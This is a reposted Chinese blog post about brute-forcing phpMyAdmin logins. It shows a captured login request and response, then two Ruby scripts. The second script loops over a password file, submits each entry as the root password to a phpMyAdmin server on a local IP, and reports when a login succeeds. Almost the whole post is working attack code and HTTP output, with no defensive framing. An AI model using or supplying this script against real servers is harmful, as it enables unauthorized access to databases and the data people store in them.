phpmyadmin爆破腳本

本文转载自查看原文 2020-03-20 14:14 1100 ruby

拦截的包
1 POST /phpMyAdmin/index.php HTTP/1.1
2 Content-Type: application/x-www-form-urlencoded
3 Connection: close
4 Host: xxx
5 User-Agent: http.rb/4.3.0
6 Content-Length: 92
7 
8 pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4cccba4055e #body

 返回的包

 1 HTTP/1.1 302 Found
 2 Date: Fri, 20 Mar 2020 04:21:23 GMT
 3 Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
 4 X-Powered-By: PHP/5.4.45
 5 Set-Cookie: phpMyAdmin=ma67sanr5modl1klbrm90fh462m1t5uv; path=/phpMyAdmin/; HttpOnly
 6 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 7 Cache-Control: private, max-age=10800, pre-check=10800
 8 Last-Modified: Sat, 27 Jul 2013 22:34:50 GMT
 9 Set-Cookie: pma_lang=en; expires=Sun, 19-Apr-2020 04:21:23 GMT; path=/phpMyAdmin/; httponly
10 Set-Cookie: pma_mcrypt_iv=XZS6z83RRds%3D; expires=Sun, 19-Apr-2020 04:21:23 GMT; path=/phpMyAdmin/; httponly
11 Set-Cookie: pmaUser-1=RwEABrA%2FOuM59PM2bVoWgw%3D%3D; expires=Sun, 19-Apr-2020 04:21:23 GMT; path=/phpMyAdmin/; httponly
12 Set-Cookie: pmaPass-1=Z5V6d%2F6GK7w%3D; path=/phpMyAdmin/; httponly
13 Location: http://192.168.1.30/phpMyAdmin/index.php?lang=en&token=dba3ae0bc84dd82272d3b4d3837969a2&phpMyAdmin=ma67sanr5modl1klbrm90fh462m1t5uv #
14 Content-Length: 0
15 Connection: close
16 Content-Type: text/html

 

 1 require 'http'
 2 url = "http://xxx/phpMyAdmin/index.php"
 3 body = "pma_username=root&pma_password=rfoot&server=1&token=3b88f0df1d082083aae8b4cccba4055e"
 4 html = HTTP.via('127.0.0.1',8080).headers("Content-Type" => "application/x-www-form-urlencoded").post(url,:body => body)
 5 cookie = []
 6 html.headers['Set-Cookie'].each do |c| #从返回的包获取Set-Cookie
 7   puts c.split[0]
 8   cookie.append c.split[0]
 9 end
10 puts html.headers['Location'] #从返回的包获取Location
11 u = html.headers['Location']
12 puts cookie.join ''
13 #pp html.headers
14 html = HTTP.headers('Cookie' => cookie.join).get u
15 puts html
16 #puts html
17 #html = HTTP.via('127.0.0.1',8080).headers('Cookie' => cookie).get(url)
18 #puts html

 从文件导出的脚本

 1 require 'http'
 2 
 3 #if ARGV.size != 2
 4 #"{  puts 'phpmyadmin_login.rb http://www.test.com/phpmyadmin/index.php password_file.txt'}
 5 #  exit
 6 #end
 7 #url = ARGV[0]
 8 #f = open ARGV[1]
 9 #puts 'Check url: '+ARGV[0]（文件里是网址）
10 
11 
12 url = "http://192.168.1.30/phpMyAdmin/index.php"
13 f = open('p.txt')
14 f.each_line do |pwd|
15   cookie = []
16   body = "pma_username=root&pma_password=#{pwd.strip}&server=1&token=3b88f0df1d082083aae8b4cccba4055e"
17   html = HTTP.headers("Content-Type" => "application/x-www-form-urlencoded").post(url,:body => body)
18   html.headers['Set-Cookie'].each do |c|
19     cookie.append (c.split ';')[0]
20   end
21   u =  html.headers['Location']
22   puts 'Check username and password : root '+pwd.strip
23   check_html = HTTP.headers('Cookie' => (cookie.join';')).get u
24   if not /Username:/ =~ check_html.to_s
25     puts 'Login OK'
26     break
27   end
28     #exit
29     #p body
30 end
31 
32 
33 
34 
35 #cookie.join ';'
36 #puts html.headers['Set-Cookie']
37 
38 #puts cookie.join ''
39 #pp html.headers
40 
41 
42 
43 
44 #html = HTTP.via('127.0.0.1',8080).headers('Cookie' => cookie).get(url)
45 #puts html

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 phpMyAdmin的使用邮箱爆破 phpmyadmin not found phpMyAdmin的配置 phpMyAdmin的配置通过 phpmyadmin getshell phpMyAdmin安装 Tomcat后台爆破指南 BURPSUITE爆破密码实现BurpSuite延时爆破